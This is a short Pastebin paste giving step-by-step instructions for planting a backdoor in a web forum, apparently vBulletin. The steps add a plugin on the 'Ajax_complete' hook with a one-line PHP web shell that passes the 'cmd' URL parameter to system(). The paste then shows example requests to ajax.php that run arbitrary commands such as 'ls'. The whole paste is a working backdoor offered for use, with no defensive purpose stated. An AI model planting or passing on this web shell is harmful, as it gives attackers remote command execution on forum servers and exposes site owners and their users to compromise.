Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Add a plugin. Make it for Ajax_complete and in the code area add :
- Code:
- if(isset($_GET['cmd'])){echo "<h1>cmd</h1><pre>"; system($_GET['cmd']);exit;}
- Activate the mod.
- Code:
- www.site.com/forumlocation/ajax.php?cmd=command
- Exemple :
- Code:
- www.site.com/forumlocation/ajax.php?cmd=ls
Advertisement
Add Comment
Please, Sign In to add comment